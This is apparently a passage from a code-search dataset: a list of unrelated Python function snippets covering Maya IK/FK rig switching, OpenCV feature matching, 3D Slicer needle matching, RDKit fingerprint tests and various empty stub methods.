upv_ctrl.setMatrix(upv_mat, worldSpace=True)\n for _ in range(20):\n cmds.xform(fk_ctrls[0].name(), ws=True, matrix=shoulder_mat)\n\n # sets keyframes\n if key:\n 
[cmds.setKeyframe(\"{}\".format(elem),\n time=(cmds.currentTime(query=True)))\n for elem in _all_controls]", "def test_fk():\n\n joints = [0.0, 2.9, 1.3, 4.2, 1.4, 0.0]\n\n path_planner = PathPlanner(\"manipulator\")\n\n pose = path_planner.get_fk(joints)\n\n print pose", "def matching(self, Y, K):\n\n ### sort data Y\n sidx = np.argsort(Y.SID)\n Y.SID = Y.SID[sidx]\n Y.Y = Y.Y[sidx,:]\n\n ### sort data K\n for kitem in K:\n sidx = np.argsort(kitem.SID)\n kitem.SID = kitem.SID[sidx]\n kitem.K = kitem.K[sidx,:][:,sidx]\n\n ### find reference set samples\n ### to boring to finish this crap....", "def ik_to_fk(node):\n ik_main_off = get_parent(node.ik_main_conn)\n fk_01_off = get_parent(node.fk_01_conn)\n fk_02_off = get_parent(node.fk_02_conn)\n fk_03_off = get_parent(node.fk_03_conn)\n\n ik_main_world_trans = get_world_trans(node.ik_main_conn)\n fk_01_world_trans = get_world_trans(node.fk_01_conn)\n ik_main_off_world_trans = get_world_trans(ik_main_off)\n fk_01_off_world_trans = get_world_trans(fk_01_off)\n fk_02_off_world_trans = get_world_trans(fk_02_off)\n fk_03_off_world_trans = get_world_trans(fk_03_off)\n\n # calculate base information\n def_len = (ik_main_off_world_trans - fk_01_off_world_trans).length()\n\n # Calculate ik direction\n ik_dir_01 = ik_main_off_world_trans - fk_01_off_world_trans\n ik_dir_02 = ik_main_world_trans - fk_01_world_trans\n\n ik_dir_rot = ik_dir_01.rotateTo(ik_dir_02).asEulerRotation()\n\n # Apply ik direction -> important to calculate correct pole rotations\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(ik_dir_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ik pole rotations\n ik_pole_world_mat = get_world_matrix(node.ik_pole_conn, 0)\n fk_03_world_inv_mat = get_world_inv_matrix(node.fk_01_conn, 0)\n\n ik_pole_rot_mat = ik_pole_world_mat * fk_03_world_inv_mat\n\n ik_pole_vec = oMa.MTransformationMatrix(ik_pole_rot_mat).translation(oMa.MSpace.kWorld)\n ik_pole_vec.y = 0\n\n ik_pole_rot = oMa.MVector.kZaxisVector.rotateTo(ik_pole_vec).asEulerRotation()\n\n # Calculate ik rotations\n tri_a_len = (fk_02_off_world_trans - fk_01_off_world_trans).length()\n tri_b_len = (fk_03_off_world_trans - fk_02_off_world_trans).length()\n tri_c_len = (ik_main_world_trans - fk_01_world_trans).length()\n\n if tri_c_len >= def_len:\n fk_02_angle = 0\n fk_01_angle = 0\n else:\n fk_02_angle = math.pi - solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"C\")\n fk_01_angle = -solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"B\")\n\n # Add rotations together\n fk_01_temp = oMa.MEulerRotation(fk_01_angle, ik_pole_rot.y, 0)\n\n ik_dir_mat = compose_mat(ik_dir_rot)\n fk_01_mat = compose_mat(fk_01_temp)\n rot_mat = fk_01_mat * ik_dir_mat\n\n # Apply everything\n fk_01_rot = get_rot_from_mat(rot_mat)\n fk_02_rot = (fk_02_angle, 0, 0)\n\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_01_rot[i], oMa.MAngle.kRadians))\n\n fk_02_rot_plugs = get_rot_plugs(node.fk_02_conn)\n for i, plug in enumerate(fk_02_rot_plugs):\n if not plug.isLocked:\n plug.setMAngle(oMa.MAngle(fk_02_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ankle rotation\n fk_03_rot = rot_world_space_to_local_space(node.ik_main_conn, get_parent(node.fk_03_conn))\n\n fk_03_rot_plugs = get_rot_plugs(node.fk_03_conn)\n for i, plug in enumerate(fk_03_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_03_rot[i], oMa.MAngle.kRadians))", "def test_match_table_post(self):\n pass", "def 
key_fk(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n # If the robot's IK attribute is on, switch the robot to\n # FK mode before proceeding\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_fk(robot)\n\n # We first check if the target/tool controller transformation and\n # orientation is already aligned with the FK chain. If so, it\n # indicates that we're performing an IK to FK switch, and we\n # keyframe its position and orientation directly, without\n # snapping the IK control to the FK hierarchy. This is to avoid\n # unneccessarily changing the controllers Euler Angle rotation\n # representation that can cause unpredictable behavior between frames\n\n if pm.objExists(tool_ctrl_path):\n ctrl_ik = tool_ctrl_path\n ctrl_fk = format_path(__TOOL_CTRL_FK_PATH, robot)\n\n # If robot doesn't have a tool controller, use target_CTRL.\n else:\n ctrl_ik = target_ctrl_path\n ctrl_fk = format_path(__TCP_HDL_PATH, robot)\n\n if not _ik_and_fk_aligned(ctrl_ik, ctrl_fk):\n _snap_ik_target_to_fk(robot)\n\n # Key all FK elements\n try:\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY')\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n\n # Key visibility of FK controllers\n for i in range(6):\n pm.setKeyframe(format_path(__FK_CTRLS_PATH, robot),\n attribute='visibility')\n except:\n pm.warning('Error setting FK keys in FK mode')\n\n # Key all IK elements\n try:\n pm.setKeyframe(target_ctrl_path, attribute='ik')\n pm.setKeyframe(target_ctrl_path, attribute='v', value=0)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')\n\n except:\n pm.warning('Error setting IK keys in FK mode')", "def match_keypoints(desc1, desc2, k=2, thresh=.9, matchertype=None):\n if not matchertype:\n # default is brute forcce\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = matcher.knnMatch(desc1, desc2, k=3)\n print(matches)\n\n elif matchertype == \"FlannORB\":\n #\n FLANN_INDEX_LSH = 6\n search_params = dict(checks=50)\n index_params = dict(algorithm=FLANN_INDEX_LSH,\n table_number=6, # 12\n key_size=12, # 20\n multi_probe_level=1) # 2\n matcher = cv2.FlannBasedMatcher(index_params, search_params)\n matches = matcher.knnMatch(desc1, desc2, k=2)\n\n elif matchertype == \"FlannSURF\":\n FLANN_INDEX_KDTREE = 2\n index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=500)\n search_params = dict(checks=50)\n matcher = cv2.FlannBasedMatcher(index_params, search_params)\n matches = matcher.knnMatch(desc1, desc2, k=2)\n\n goodmatches = []\n for m, n in matches:\n if m.distance < thresh * n.distance:\n goodmatches.append(m)\n return goodmatches", "def match(self, dc):\n raise 
NotImplemented", "def secondary_keys(self):", "def match(self, other):", "def correspondence_points(img1, img2, tag='c'):\n if len(img1.shape) == 3:\n img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n if len(img2.shape) == 3:\n img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\n detector = cv2.SURF(800)\n norm = cv2.NORM_L2\n flann_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)\n kp1, desc1 = detector.detectAndCompute(img1, None)\n kp2, desc2 = detector.detectAndCompute(img2, None)\n raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2\n p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches)\n\n if len(p1) >= 4:\n H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 5.0)\n print '%d / %d inliers/matched' % (np.sum(status), len(status))\n status = status.reshape(-1) # flatten\n p1 = p1[status == 1]\n p2 = p2[status == 1]\n kp_pairs = [kp_pairs[i] for i in range(len(kp_pairs)) if status[i] == 1]\n else:\n # Just depend on the thresholding for filtering matches\n p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches, ratio=0.3)\n\n draw_correspondence_points(img1, img2, kp_pairs, tag=tag)\n return p1, p2, kp_pairs", "def newmatch(self):\n\n objectpnts = self.kif.getObjectPcd()\n # normals\n objectnormals = tools.estimatenormals(objectpnts)", "def match_source_key(self, match):\n raise NotImplementedError", "def needleMatching(self):\r\n # productive\r\n profprint()\r\n modelNodes = slicer.mrmlScene.GetNodesByClass('vtkMRMLModelNode')\r\n nbNode = modelNodes.GetNumberOfItems()\r\n result = []\r\n found = []\r\n # print nbNode\r\n for nthNode in range(nbNode):\r\n node = slicer.mrmlScene.GetNthNodeByClass(nthNode, 'vtkMRMLModelNode')\r\n if node.GetID() not in found and node.GetAttribute('type') != 'Validation':\r\n dist = []\r\n polydata = node.GetPolyData()\r\n if polydata != None:\r\n bounds = polydata.GetBounds()\r\n for nthNode2 in range(nbNode):\r\n node2 = slicer.mrmlScene.GetNthNodeByClass(nthNode2, 'vtkMRMLModelNode')\r\n if node2.GetID() not in found and node2.GetAttribute('type') == 'Validation':\r\n polydata2 = node2.GetPolyData()\r\n if polydata2 != None and polydata2.GetNumberOfPoints() > 100 and polydata.GetNumberOfPoints() > 100:\r\n tipDistance = self.distTip(int(node.GetID().strip('vtkMRMLModelNode')) , int(node2.GetID().strip('vtkMRMLModelNode')))\r\n baseDistance = self.distBase(int(node.GetID().strip('vtkMRMLModelNode')) , int(node2.GetID().strip('vtkMRMLModelNode')))\r\n name = node.GetName()\r\n manualName = name.lstrip('auto-seg_').lstrip('manual-seg_').lstrip('obturator-seg_').lstrip('0123456789').lstrip('-ID-vtkMRMLModelNode').lstrip('0123456789-')\r\n if manualName==node2.GetName(): dist.append([tipDistance, node2.GetID(), node2.GetName()])\r\n # print tipDistance\r\n if dist != []:\r\n match = [min(dist)[0], min(dist)[1], node.GetID(), min(dist)[2]]\r\n result.append(match)\r\n found.append(min(dist)[1])\r\n found.append(node.GetID())\r\n node.GetDisplayNode().SetSliceIntersectionVisibility(1)\r\n # print result\r\n return result", "def findMatchesBetweenImages(image_1, image_2):\n # matches - type: list of cv2.DMath\n matches = None\n # image_1_kp - type: list of cv2.KeyPoint items.\n image_1_kp = None\n # image_1_desc - type: numpy.ndarray of numpy.uint8 values.\n image_1_desc = None\n # image_2_kp - type: list of cv2.KeyPoint items.\n image_2_kp = None\n # image_2_desc - type: numpy.ndarray of numpy.uint8 values.\n image_2_desc = None\n # WRITE 
YOUR CODE HERE.\n\n sift = cv2.ORB_create()\n image_1_kp, image_1_desc = sift.detectAndCompute(image_1, None)\n image_2_kp, image_2_desc = sift.detectAndCompute(image_2, None)\n\n # bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n # matches = bf.match(image_1_desc, image_2_desc)\n # matches = sorted(matches, key = lambda x:x.distance)\n # matches = matches[:10]\n\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(image_1_desc, image_2_desc, k=2)\n\n # Apply ratio test\n good = []\n for m, n in matches:\n print(m.distance, n.distance, m.distance < .75*n.distance)\n if m.distance < (0.75 * n.distance):\n good.append([m])\n\n # We coded the return statement for you. You are free to modify it -- just\n # make sure the tests pass.\n print(len(good), good)\n return image_1_kp, image_2_kp, matches\n # END OF FUNCTION.", "def needleMatching(self):\n #productive\n profprint()\n modelNodes=slicer.mrmlScene.GetNodesByClass('vtkMRMLModelNode')\n nbNode=modelNodes.GetNumberOfItems()\n result=[]\n found=[]\n #print nbNode\n for nthNode in range(nbNode):\n node=slicer.mrmlScene.GetNthNodeByClass(nthNode,'vtkMRMLModelNode')\n if node.GetID() not in found and node.GetAttribute('type')!='Validation':\n dist=[]\n polydata = node.GetPolyData()\n if polydata!=None:\n bounds = polydata.GetBounds()\n for nthNode2 in range(nbNode):\n node2=slicer.mrmlScene.GetNthNodeByClass(nthNode2,'vtkMRMLModelNode')\n if node2.GetID() not in found and node2.GetAttribute('type')=='Validation':\n polydata2 = node2.GetPolyData()\n if polydata2!=None and polydata2.GetNumberOfPoints()>100 and polydata.GetNumberOfPoints()>100:\n\n axialDistance=self.distTip( int(node.GetID().strip('vtkMRMLModelNode')) , int(node2.GetID().strip('vtkMRMLModelNode')))\n \n dist.append([axialDistance,node2.GetID()])\n # print axialDistance\n \n if dist!=[]:\n match=[min(dist)[0],min(dist)[1],node.GetID()]\n result.append(match)\n found.append(min(dist)[1])\n found.append(node.GetID()) \n node.GetDisplayNode().SetSliceIntersectionVisibility(1)\n # print result\n return result", "def find(self, image, k=None, ratio=None):\n if not self._targets:\n return []\n k = 2 if k is None else k\n ratio = 0.75 if ratio is None else ratio\n keypoints, descriptors = self._detector.detectAndCompute(image, None)\n if len(keypoints) < self.min_match_count:\n return []\n matches = self._matcher.knnMatch(descriptors, k=int(k))\n matches = [m[0] for m in matches if len(m) == 2 and m[0].distance < m[1].distance * ratio]\n if len(matches) < self.min_match_count:\n return []\n matches_by_id = [[] for _ in xrange(len(self._targets))]\n for m in matches:\n matches_by_id[m.imgIdx].append(m)\n tracked = []\n for imgIdx, matches in enumerate(matches_by_id):\n if len(matches) < self.min_match_count:\n continue\n target = self._targets[imgIdx]\n p0 = [target.keypoints[m.trainIdx].pt for m in matches]\n p1 = [keypoints[m.queryIdx].pt for m in matches]\n p0, p1 = np.float32((p0, p1))\n H, status = cv2.findHomography(p0, p1, cv2.RANSAC, 3.0)\n status = status.ravel() != 0\n if status.sum() < self.min_match_count:\n continue\n p0, p1 = np.int32((p0, p1))\n inliers = [((x0, y0), (x1, y1)) for (x0, y0), (x1, y1), s in zip(p0, p1, status) if s]\n outliers = [((x0, y0), (x1, y1)) for (x0, y0), (x1, y1), s in zip(p0, p1, status) if not s]\n quad = cv2.perspectiveTransform(target.quad.reshape(1, -1, 2), H).reshape(-1, 2)\n track = TrackedTarget(target=target, image=image, inliers=inliers, outliers=outliers, H=H, quad=quad)\n tracked.append(track)\n tracked.sort(key = lambda t: 
len(t.inliers), reverse=True)\n return tracked", "def match_features(kp1, kp2, des1, des2):\n FLANN_INDEX_LSH = 6\n index_params= dict(algorithm = FLANN_INDEX_LSH,\n table_number = 6, # 12\n key_size = 12, # 20\n multi_probe_level = 2) #2\n\n search_params = dict(checks=50) # or pass empty dictionary\n flann = cv2.FlannBasedMatcher(index_params,search_params)\n matches = flann.knnMatch(des1,des2,k=2)\n good = []\n for (m,n) in matches:\n if m.distance < 0.8*n.distance: ## Lowe's ratio imp for tuning\n good.append(m)\n\n if len(good) < 20:\n return []\n return good", "def secondary_keys_dicts(self):", "def key_ik_fk(*args):\n if not pm.window(\"mimic_win\", exists=True):\n return\n\n current_tab = pm.tabLayout('switcher_tab_layout',\n query=True,\n selectTabIndex=True)\n\n try:\n if current_tab == 1:\n key_ik()\n elif current_tab == 2:\n key_fk()\n except:\n pm.warning('Error keying IK/FK')", "def delete_ik_fk_keys(*args):\n if not check_robot_selection():\n pm.warning('No robots selected; ' \\\n 'Select at least one robot.')\n\n keyed_attrs = {__TARGET_CTRL_PATH: ['ik',\n 'visibility',\n 'ikSolution1',\n 'ikSolution2',\n 'ikSolution3'],\n __FK_CTRLS_PATH: ['visibility'],\n __A1_FK_CTRL_PATH: ['rotateY'],\n __A2_FK_CTRL_PATH: ['rotateX'],\n __A3_FK_CTRL_PATH: ['rotateX'],\n __A4_FK_CTRL_PATH: ['rotateZ'],\n __A5_FK_CTRL_PATH: ['rotateX'],\n __A6_FK_CTRL_PATH: ['rotateZ']}\n\n robots = get_robot_roots()\n\n current_frame = pm.currentTime()\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n # Check if there's a keyframe set on the target_CTRL.ik attribute\n key = pm.keyframe(target_ctrl_path,\n attribute='ik',\n query=True,\n time=current_frame)\n\n # If there is no keyframe set on the IK attribute, continue to the\n # next robot\n if not key:\n pm.warning('{} has no IK|FK keyframe at frame {}' \\\n .format(robot, current_frame))\n continue\n\n # If there is a keyframe on the IK attribute, we also check if there's\n # a keyframe on an FK controller as well, as we only consider there to\n # be a proper IK or FK keyframe if both are true\n # Note, we only need to check a single FK controller as they should all\n # be keyframed (or not) together\n fk_test_handle_path = format_path(__A1_FK_CTRL_PATH + '.rotateY', robot)\n fk_key = pm.keyframe(fk_test_handle_path,\n query=True,\n time=current_frame)\n # If there is no keyframe set on the FK controller attribute,\n # continue to the next robot\n if not fk_key:\n pm.warning('{} has no IK|FK keyframe at frame {}' \\\n .format(robot, current_frame))\n continue \n\n for obj in keyed_attrs:\n for attr in keyed_attrs[obj]:\n pm.cutKey(format_path(obj, robot),\n time=current_frame,\n attribute=attr,\n option=\"keys\")\n\n if pm.objExists(tool_ctrl_path):\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='visibility',\n option=\"keys\")\n\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='translate',\n option=\"keys\")\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='rotate',\n option=\"keys\")\n else:\n pm.cutKey(target_ctrl_path,\n time=current_frame,\n attribute='translate',\n option=\"keys\")\n pm.cutKey(target_ctrl_path,\n time=current_frame,\n attribute='rotate',\n option=\"keys\")", "def altloc_match(self, other: AtomKey) -> bool:\n ...", "def visulize_matches(matches, k2, k1, img2, img1):\n\n import scipy as sp\n img2 = cv.cvtColor(img2, 
cv.COLOR_GRAY2BGR)\n h1, w1 = img1.shape[:2]\n h2, w2 = img2.shape[:2]\n view = sp.zeros((max(h1, h2), w1 + w2, 3), sp.uint8)\n view[:h1, :w1, :] = img1 \n view[:h2, w1:, :] = img2\n view[:, :, 1] = view[:, :, 0] \n view[:, :, 2] = view[:, :, 0]\n\n for m in matches:\n m = m[0]\n # draw the keypoints\n # print m.queryIdx, m.trainIdx, m.distance\n color = tuple([sp.random.randint(0, 255) for _ in xrange(3)])\n pt1 = (int(k1[m.queryIdx].pt[0]), int(k1[m.queryIdx].pt[1]))\n pt2 = (int(k2[m.trainIdx].pt[0] + w1), int(k2[m.trainIdx].pt[1]))\n\n cv.line(view, pt1, pt2, color)\n return view", "def test_getCpfRelations(self):\n pass", "def lookup(self, key):", "def relationships(self):", "def keys(targets):", "def matches(self):\n pass", "def theidfobjectmentioningobjs(idfindex, keyindex, objindex):\n idf, edges = eppystuff.an_idfedges(idfindex)\n objnames = idf_helpers.idfobjectkeys(idf)\n objname = objnames[keyindex]\n idfobjects = idf.idfobjects[objname]\n idfobject = idfobjects[objindex]\n from eppy import walk_hvac\n try:\n idfobjectname = idfobject.Name\n except BadEPFieldError as e:\n idfobjectname = idfobject.Zone_Name\n \n nextnodes = walk_hvac.nextnode(edges, idfobjectname)\n nextobjs = [eppystuff.hvacname2idfobj(idf, nnode) for nnode in nextnodes]\n keyobjids = [eppystuff.idfobjectindices(idf, nobj) for nobj in nextobjs]\n nurls = [\"../../%s/%s\" % (key_id, obj_id) for key_id, obj_id in keyobjids]\n nextlinks = ['<a href=%s>%s</a>' % (url, nnode)\n for nnode, url in zip(nextnodes, nurls)]\n firstlines = [\n \"HVAC connections from %s named '%s'\" % (objname, idfobjectname),\n \"\",\n \"Next Objects\",\n ]\n betweenlines = [\"\", \"Previous Objects\"]\n prevnodes = walk_hvac.prevnode(edges, idfobjectname)\n prevobjs = [eppystuff.hvacname2idfobj(idf, pnode) for pnode in prevnodes]\n keyobjids = [eppystuff.idfobjectindices(idf, nobj) for nobj in prevobjs]\n try:\n purls = [\"../../%s/%s\" % (key_id, obj_id) \n for key_id, obj_id in keyobjids]\n except TypeError as e:\n purls = []\n prevlinks = ['<a href=%s>%s</a>' % (url, pnode)\n for pnode, url in zip(prevnodes, purls)]\n # image snippet\n onlythis = [idfobjectname, ] + nextnodes + prevnodes\n trimmed = eppystuff.trimedges(edges, onlythis)\n from eppy.useful_scripts import loopdiagram\n imgname = '%s_%s_%s' % (idfindex, keyindex, objindex)\n eppystuff.save_imagesnippets(IMGFOLDER,imgname, trimmed)\n imgline = ['<img src=\"../../../../../static/%s.png\" alt=\"snippet\">' % (imgname, )]\n html = '<br>'.join(firstlines + nextlinks + betweenlines + prevlinks + imgline)\n return html", "def keyEquivalent( self ):\n\t\treturn None", "def fk_to_ik(node):\n # Get relevant data\n ik_pole_off = get_parent(node.ik_pole_conn)\n\n world_trans_ik_pole_off = get_world_trans(ik_pole_off)\n world_trans_fk_01 = get_world_trans(node.fk_01_conn)\n world_trans_fk_02 = get_world_trans(node.fk_02_conn)\n world_trans_fk_03 = get_world_trans(node.fk_03_conn)\n world_trans_ik_pole = get_world_trans(node.ik_pole_conn)\n\n world_rot_fk_03 = get_world_rot(node.fk_03_conn)\n\n # calculate ik pole position\n ik_pole_mid_point = (world_trans_fk_01 + world_trans_fk_03) / 2\n ik_pole_base = world_trans_fk_02 - ik_pole_mid_point\n\n # Handle the case when the leg is fully stretched\n if ik_pole_base.length() <= 0.0001:\n rot_fk_01 = get_rot_as_quat(node.fk_01_conn)\n rot_fk_02 = get_rot_as_quat(node.fk_02_conn)\n\n rot = rot_fk_01 * rot_fk_02\n\n ik_pole_base = oMa.MVector(2 * (rot.x * rot.z + rot.w * rot.y),\n 2 * (rot.y * rot.z - rot.w * rot.x),\n 1 - 2 * (rot.x * rot.x 
+ rot.y * rot.y))\n\n ik_pole_len = (world_trans_ik_pole - world_trans_fk_02).length()\n\n pos_ik_pole = world_trans_fk_02 + ik_pole_base.normalize() * ik_pole_len - world_trans_ik_pole_off\n\n # Get the destination MPlugs\n ik_main_trans_plugs = get_trans_plugs(node.ik_main_conn)\n ik_main_rot_plugs = get_rot_plugs(node.ik_main_conn)\n ik_pole_trans_plugs = get_trans_plugs(node.ik_pole_conn)\n\n # Set the new values\n for i, plug in enumerate(ik_main_trans_plugs):\n plug.setFloat(world_trans_fk_03[i])\n\n for i, plug in enumerate(ik_main_rot_plugs):\n plug.setMAngle(oMa.MAngle(world_rot_fk_03[i], oMa.MAngle.kRadians))\n\n for i, plug in enumerate(ik_pole_trans_plugs):\n plug.setFloat(pos_ik_pole[i])", "def MatchRelationshipConfrontation(C):\n for c in C:\n if c.relationships is None:\n continue\n for i, longname in enumerate(c.relationships):\n found = False\n for cor in C:\n if longname.lower() == cor.longname.lower():\n c.relationships[i] = cor\n found = True\n return C", "def find_matching_points(img1, img2, max_pix_movement=50, normalize=True, show=False):\n\n # Initiate ORB detector\n orb = cv2.ORB_create()\n\n # find the keypoints and descriptors with ORB\n kp1, des1 = orb.detectAndCompute(img1, None)\n kp2, des2 = orb.detectAndCompute(img2, None)\n\n # create BFMatcher object\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n # Match descriptors.\n matches = bf.match(des1,des2)\n # Sort them in the order of their distance.\n matches = sorted(matches, key = lambda x:x.distance)\n # Draw first 10 matches.\n if show:\n img3 = cv2.drawMatches(img1,kp1,img2,kp2,matches[:500], None,flags=2)\n plt.imshow(img3),plt.show()\n # Get the matching keypoints for each of the images\n\n list_kp1 = []\n list_kp2 = []\n for mat in matches:\n img1_idx = mat.queryIdx\n img2_idx = mat.trainIdx\n\n # x - columns\n # y - rows\n list_kp1.append(kp1[img1_idx].pt)\n list_kp2.append(kp2[img2_idx].pt)\n\n n_kp1, n_kp2 = np.float32(list_kp1), np.float32(list_kp2)\n n_kp1 /= np.asarray([img1.shape[1], img1.shape[0]], np.float32)\n n_kp2 /= np.asarray([img2.shape[1], img2.shape[0]], np.float32)\n n_kp1 = n_kp1 * 2. - 1.\n n_kp2 = n_kp2 * 2. 
- 1.\n\n return np.int32(list_kp1), np.int32(list_kp2), n_kp1, n_kp2", "def nn_match(descs1, descs2):\n # diff = descs1[:, None, :] - descs2[None, :, :]\n # diff = np.linalg.norm(diff, ord=2, axis=2)\n # indices = np.argmin(diff, axis=1)\n\n flann = cv2.FlannBasedMatcher_create()\n matches = flann.match(descs1.astype(np.float32), descs2.astype(np.float32))\n indices = [x.trainIdx for x in matches]\n\n return indices", "def check_keys(self):", "def match(image1,image2,threshold,useRansac=False,t_orientation=30,t_scale=0.5):\r\n im1, keypoints1, descriptors1 = ReadKeys(image1)\r\n im2, keypoints2, descriptors2 = ReadKeys(image2)\r\n #\r\n # REPLACE THIS CODE WITH YOUR SOLUTION (ASSIGNMENT 5, QUESTION 3)\r\n #\r\n # Generate five random matches (for testing purposes)\r\n # matched_pairs = []\r\n # num = 5\r\n # for i in range(num):\r\n # matched_pairs.append([keypoints1[i],keypoints2[i]])\r\n # return DisplayMatches(im1, im2, matched_pairs)\r\n\r\n # END OF SECTION OF CODE TO REPLACE\r\n #\r\n\r\n #q3\r\n matched_pairs = []\r\n between_angles = np.arccos(np.dot(descriptors1, np.transpose(descriptors2)))\r\n for i, row in enumerate(between_angles):\r\n \tratio = sorted(row)[0] / sorted(row)[1]\r\n \tif ratio <= threshold:\r\n\t \tmatched_pairs.append([keypoints1[i], keypoints2[np.where(row == sorted(row)[0])[0][0]]])\r\n # print(matched_pairs)\r\n if useRansac is False:\r\n return DisplayMatches(im1, im2, matched_pairs)\r\n\t# \r\n\r\n #q4\r\n repetition = 10\r\n subsets = [[]] * repetition\r\n for i in range(repetition):\r\n r = random.randint(0, len(matched_pairs))\r\n for match in matched_pairs:\r\n ds1, ds2 = matched_pairs[r][1][2]/matched_pairs[r][0][2], match[1][2]/match[0][2]\r\n do1, do2 = (matched_pairs[r][1][3]-matched_pairs[r][0][3]), (match[1][3]-match[0][3])\r\n if abs(ds2 - ds1) <= t_scale * ds1 and abs(do2 - do1) % (2 * math.pi) <= t_orientation:\r\n subsets[i].append(match)\r\n\r\n max_i, max_len = 0, subsets[0]\r\n for i in range(10):\r\n l = len(subsets[i])\r\n if l > max_len:\r\n max_len = l\r\n max_i = i\r\n\r\n im3 = DisplayMatches(im1, im2, subsets[max_i])\r\n return im3", "def match(self, other):\n matches = match_descriptors(self.base_view.descriptors, other.descriptors,\n cross_check=True)\n matches = pd.Series({m[0]: m[1] for m in matches}).reindex(\n self._match_table.index)\n self._match_table[other.position.id] = matches", "def compute_matches(self):\n\t\tself.local_database[\"figure_number\"] = [0] * len(self.local_database[\"feature_vectors\"])\n\t\tForensics = wbForensicsHOG(Database=self.local_database)\n\t\tForensics.KDTree_pairs(leaf_size = len(self.local_database)+1)\n\t\tForensics.d_rank(pairs=Forensics.pairs, distances=Forensics.dists, ratios=Forensics.ratios)\n\n\t\tself.local_matches = Forensics.Dist_Rank", "def IK_geometric(dh_params, pose):\n pass", "def _digest_fkeys(self):\n for schema in self.schemas.values():\n for fkey in schema._fkeys.values():\n ref_col = fkey._fkey_doc.get('referenced_columns', [{}])[0]\n pk_sname, pk_tname = ref_col.get('schema_name'), ref_col.get('table_name')\n if pk_sname in self.schemas and pk_tname in self.schemas[pk_sname].tables:\n fkey.pk_table = self.schemas[pk_sname].tables[pk_tname]\n else:\n fkey.pk_table = self._unknown_table", "def test4(self):\n tgts = [ ('CCC(O)C(=O)O',\n ('CCC','OCC','OCC=O','OCCO','CCCC','OC=O','CC(O)C')),\n ]\n for smi,matches in tgts:\n m = Chem.MolFromSmiles(smi)\n fp1 = Chem.RDKFingerprint(m,2,7,9192,4,0)\n obs = fp1.GetOnBits()\n for match in matches:\n m2 = Chem.MolFromSmiles(match)\n 
fp2 = Chem.RDKFingerprint(m2,2,7,9192,4,0)\n v1,v2 = DataStructs.OnBitProjSimilarity(fp2,fp1)\n assert feq(v1,1.0000),'substruct %s not properly contained in %s'%(match,smi)", "def associated_coroot(self):", "def matchById(firstcat, othercat, otherid='SeqNr', selfid='SeqNr'):\n order = {}\n for i, x in enumerate(firstcat[selfid]):\n order[x] = i\n\n keeporder = []\n for x in othercat[otherid]:\n if x in order:\n keeporder.append(order[x])\n\n keep = np.array(keeporder)\n matched = firstcat[keep]\n print \"INFO: %i matched galaxies kept\" % len(matched)\n return matched", "def match(self, item):", "def _ik_and_fk_aligned(ik_ctrl, tcp_handle):\n\n # Define some small number to threshold our output\n delta = .0001\n\n # Initialize variables\n # translation_is_aligned = False\n # rotation_is_aligned = False\n ik_fk_are_aligned = False\n\n # Find the translation of each object and compare them\n ik_trans = pm.xform(ik_ctrl, q=True, rp=True, ws=True)\n tcp_trans = pm.xform(tcp_handle, q=True, rp=True, ws=True)\n\n # Find the distance between the ik controller and the tcp handle\n trans_diff = math.sqrt((ik_trans[0] - tcp_trans[0]) ** 2\n + (ik_trans[1] - tcp_trans[1]) ** 2\n + (ik_trans[2] - tcp_trans[2]) ** 2)\n\n if round(trans_diff, 6) < delta:\n ik_fk_are_aligned = True\n\n return ik_fk_are_aligned", "def matchModelPose(self):\n\n pass", "def _add_matches(self):\r\n for record in self.records:\r\n match_dict={key_to_track: 